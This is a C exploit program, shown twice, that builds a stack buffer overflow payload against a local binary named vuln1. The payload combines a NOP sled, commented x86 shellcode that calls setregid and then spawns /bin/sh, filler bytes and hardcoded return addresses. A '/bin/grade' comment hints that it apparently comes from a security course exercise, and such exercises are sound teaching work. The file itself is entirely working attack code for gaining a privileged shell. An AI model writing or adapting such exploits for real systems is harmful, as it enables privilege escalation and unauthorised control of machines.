bountin/attack.c

## attack.c
#include <stdio.h> // printf
#include <stdlib.h> // malloc
#include <string.h> // strlen strncpy
#include <unistd.h> //execl

char nop = '\220';

char *shellcode =
// setregid(-1, 201)
  "\x29\xc0"			// subl %eax, %eax
  "\xb0\x47"			// movb $71, %al		<-- Syscall 71 = setregid
  "\x29\xdb"			// subl %ebx, %ebx		<-- Nullify first parameter
  "\xb3\xc9"			// movb $201, %bl		<-- Second param: group => 201 (which will residue first in ebx ...)
  "\x89\xd9"			// movl %ebx, %ecx		<-- Now the second param is in place
  "\x29\xdb"			// subl %ebx, %ebx		<-- Again nullify first parameter
  "\x83\xeb\x01"		// sub %ebx, -1			<-- First param: user => -1 (= no change)
  "\xcd\x80"			// int $0x80

// Preparations of the shell execution
  "\xeb\x1f"			// jmp 0x1f			<-- 1) Go to the last call stmt to get the address of the string
  "\x5e" 			// popl   %esi			<-- and ff. all that adress finding fun
  "\x89\x76\x08"		// movl   %esi,0x8(%esi)
  "\x31\xc0"			// xorl   %eax,%eax
  "\x88\x46\x07"		// movb   %eax,0x7(%esi)
  "\x89\x46\x0c"		// movl   %eax,0xc(%esi)

// execve("/bin/sh", "sh")
  "\xb0\x0b"			// movb   $0xb,%al 		<-- Syscall 11 = execve
  "\x89\xf3"			// movl   %esi,%ebx		<-- First param: adress of the /bin/sh string
  "\x8d\x4e\x08"		// leal   0x8(%esi),%ecx	<-- Second param: argv[0] = programe name = sh
  "\x8d\x56\x0c"		// leal   0xc(%esi),%edx	<-- Third param: null pointer
  "\xcd\x80"			// int    $0x80			<-- Kernel mode!

// exit(0)
  "\x31\xdb"			// xorl   %ebx,%ebx		<-- First param: 0
  "\x89\xd8"			// movl   %ebx,%eax
  "\x40"			// inc    %eax			<-- Syscall 1 = exit
  "\xcd\x80"			// int    $0x80			<-- Kernel mode!

  "\xe8\xdc\xff\xff\xff"	// call   -0x24			<-- 1) Go back to the normal program run
//  "/bin/grade"
  "/bin/sh   "
  "---";

void main(int argc, char* argv[]) {
	int i;
	int offset = 0;

	int nops = 185 - strlen(shellcode);

	int argument_size = nops + sizeof shellcode + 106 + 1 + 8 + 4 + 4 + 10;

	char* evil_argument = malloc(argument_size +1);
	if (evil_argument == NULL) {
		printf("malloc failed");
		exit(1);
	}

	// Prepare the nop sledge
	for (i=0; i<nops; i++) {
		evil_argument[offset++] = nop;
	}

	// Add shellcode
	strncpy(&evil_argument[nops], shellcode, strlen(shellcode));
	offset += strlen(shellcode);

	// Add 106 Bytes filler
	for (i=0; i<106; i++) {
		evil_argument[offset++] = '.';
	}

	// Length stack element
	evil_argument[offset++] = '\52';

	// 8 Bytes filler
	for (i=0; i<9; i++) {
		evil_argument[offset++] = '.';
	}

	// \250\365\377\277 (= saved stack pointer)
	strncpy(&evil_argument[offset], "\250\365\377\277", 4);
	offset += 4;

	// \200\364\377\277 (= saved eip)
	strncpy(&evil_argument[offset], "\xe0\xf4\xff\xbf", 4);
	offset += 4;

	evil_argument[offset++] = '\0';

	execl ("/usr/local/bin/vuln1", "/usr/local/bin/vuln1", evil_argument, (char *)NULL);
}
	#include <stdio.h> // printf
	#include <stdlib.h> // malloc
	#include <string.h> // strlen strncpy
	#include <unistd.h> //execl

	char nop = '\220';

	char *shellcode =
	// setregid(-1, 201)
	"\x29\xc0" // subl %eax, %eax
	"\xb0\x47" // movb $71, %al <-- Syscall 71 = setregid
	"\x29\xdb" // subl %ebx, %ebx <-- Nullify first parameter
	"\xb3\xc9" // movb $201, %bl <-- Second param: group => 201 (which will residue first in ebx ...)
	"\x89\xd9" // movl %ebx, %ecx <-- Now the second param is in place
	"\x29\xdb" // subl %ebx, %ebx <-- Again nullify first parameter
	"\x83\xeb\x01" // sub %ebx, -1 <-- First param: user => -1 (= no change)
	"\xcd\x80" // int $0x80

	// Preparations of the shell execution
	"\xeb\x1f" // jmp 0x1f <-- 1) Go to the last call stmt to get the address of the string
	"\x5e" // popl %esi <-- and ff. all that adress finding fun
	"\x89\x76\x08" // movl %esi,0x8(%esi)
	"\x31\xc0" // xorl %eax,%eax
	"\x88\x46\x07" // movb %eax,0x7(%esi)
	"\x89\x46\x0c" // movl %eax,0xc(%esi)

	// execve("/bin/sh", "sh")
	"\xb0\x0b" // movb $0xb,%al <-- Syscall 11 = execve
	"\x89\xf3" // movl %esi,%ebx <-- First param: adress of the /bin/sh string
	"\x8d\x4e\x08" // leal 0x8(%esi),%ecx <-- Second param: argv[0] = programe name = sh
	"\x8d\x56\x0c" // leal 0xc(%esi),%edx <-- Third param: null pointer
	"\xcd\x80" // int $0x80 <-- Kernel mode!

	// exit(0)
	"\x31\xdb" // xorl %ebx,%ebx <-- First param: 0
	"\x89\xd8" // movl %ebx,%eax
	"\x40" // inc %eax <-- Syscall 1 = exit
	"\xcd\x80" // int $0x80 <-- Kernel mode!

	"\xe8\xdc\xff\xff\xff" // call -0x24 <-- 1) Go back to the normal program run
	// "/bin/grade"
	"/bin/sh "
	"---";

	void main(int argc, char* argv[]) {
	int i;
	int offset = 0;

	int nops = 185 - strlen(shellcode);

	int argument_size = nops + sizeof shellcode + 106 + 1 + 8 + 4 + 4 + 10;

	char* evil_argument = malloc(argument_size +1);
	if (evil_argument == NULL) {
	printf("malloc failed");
	exit(1);
	}

	// Prepare the nop sledge
	for (i=0; i<nops; i++) {
	evil_argument[offset++] = nop;
	}

	// Add shellcode
	strncpy(&evil_argument[nops], shellcode, strlen(shellcode));
	offset += strlen(shellcode);

	// Add 106 Bytes filler
	for (i=0; i<106; i++) {
	evil_argument[offset++] = '.';
	}

	// Length stack element
	evil_argument[offset++] = '\52';

	// 8 Bytes filler
	for (i=0; i<9; i++) {
	evil_argument[offset++] = '.';
	}

	// \250\365\377\277 (= saved stack pointer)
	strncpy(&evil_argument[offset], "\250\365\377\277", 4);
	offset += 4;

	// \200\364\377\277 (= saved eip)
	strncpy(&evil_argument[offset], "\xe0\xf4\xff\xbf", 4);
	offset += 4;

	evil_argument[offset++] = '\0';

	execl ("/usr/local/bin/vuln1", "/usr/local/bin/vuln1", evil_argument, (char *)NULL);
	}